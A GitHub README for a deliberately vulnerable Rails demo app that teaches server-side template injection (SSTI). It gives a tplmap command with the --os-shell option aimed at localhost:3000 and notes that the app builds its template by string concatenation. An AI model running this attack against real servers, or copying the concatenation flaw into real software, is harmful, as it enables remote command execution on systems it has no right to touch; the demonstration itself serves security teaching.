Skip to content

Latest commit

 

History

History
19 lines (12 loc) · 468 Bytes

README.md

File metadata and controls

19 lines (12 loc) · 468 Bytes

# Hands-on SSTI attack on Rails app

This application is a demonstration prototype just to show how to perform SSTI (Server side templating injection) attack.

Run server

rails server

Hack

Run SSTI attack with tplmap:

./tplmap.py --data 'name=value1' --engine erb --os-shell -u 'http://localhost:3000'

In this example, the template is built by concatenation 😱